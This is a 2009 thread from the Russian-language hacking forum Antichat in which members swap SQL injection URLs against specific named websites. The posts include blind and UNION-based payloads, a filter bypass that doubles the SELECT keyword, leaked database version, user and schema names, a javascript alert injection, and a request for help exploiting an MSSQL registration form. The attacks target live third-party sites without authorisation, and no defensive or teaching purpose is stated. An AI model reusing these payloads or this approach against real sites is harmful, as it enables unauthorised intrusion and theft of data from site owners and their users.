ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.06.2009, 10:18
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Код:
http://realquest.real-host.ru/show.php?id=12+and+substring(version(),1,1)=5
|
|
|
08.06.2009, 10:19
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
СКуль, давно находил уже как с открытия, там фильтр жёсткий
|
|
|
|
08.06.2009, 10:20
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944
Репутация:
1550
|
|
TreV@N обычная слепая скуля
http://realquest.real-host.ru/show.php?id=12+AND+SUBSTRING((version()),1,1)=x
Version : 5.0.77-community
User : realq137_quest@localhost
Database : realq137_quest
|
|
|
|
08.06.2009, 10:22
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Чи не фильтр(Скуля зрячая, надо просто немного подумать  ):
http://realquest.real-host.ru/show.php?id=-12+UNION+SeSelectlect+1,concat_ws(0x3a,user(),vers ion(),database()),3,4--+ |
|
|
|
08.06.2009, 10:26
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Хех, там такой же фильтр, как я писал давно тупо удаляет юнион . |
|
|
|
08.06.2009, 11:56
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
Провел на форуме:
801258
Репутация:
33
|
|
Набрал такую ссылку,вывел мне запрос гляньте скажите че это
http://www.spravkaweb.ru/javascript:_alert%28%27Hello_world%27%29%3B
|
|
|
|
08.06.2009, 12:59
|
|
Познающий
Регистрация: 11.02.2009
Сообщений: 98
Провел на форуме:
1446969
Репутация:
169
|
|
http://www.spravkaweb.ru/jhj'_union_select_1,2,3,concat(user(),0x3a,version ()),5,'1
забавная скуль)
жаль, что знак подчеркивания на пробел заменяется...
Последний раз редактировалось laedafess; 08.06.2009 в 13:03..
|
|
|
|
08.06.2009, 13:07
|
|
Banned
Регистрация: 12.07.2008
Сообщений: 206
Провел на форуме:
801258
Репутация:
33
|
|
этой скулью можно ченить сделать веселого?
|
|
|
|
08.06.2009, 13:50
|
|
Участник форума
Регистрация: 21.03.2009
Сообщений: 207
Провел на форуме:
554850
Репутация:
119
|
|
ребят помогите пожалуйста
на одном сайте есть регалка в которой не фильтруется кавычка при этом база выдает ошибку такого вида
Warning: mssql_query() [function.mssql-query]: message: Unclosed quotation mark before the character string '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32
Warning: mssql_query() [function.mssql-query]: message: Line 1: Incorrect syntax near '1\')'. (severity 15) in /opt/lampp/htdocs/register/processor.php on line 32
Warning: mssql_query() [function.mssql-query]: Query failed in /opt/lampp/htdocs/register/processor.php on line 32
Ошибка выполнения запроса! Видимо что-то не так... SELECT * FROM users WHERE (name = '1\'')
Можно ли чего с этим сделать??? |
|
|
|
08.06.2009, 13:52
|
|
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802
Репутация:
380
|
|
Судя по выводимой ошибки для завершения запроса необходима кавычка а у тебя она слешируеться.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
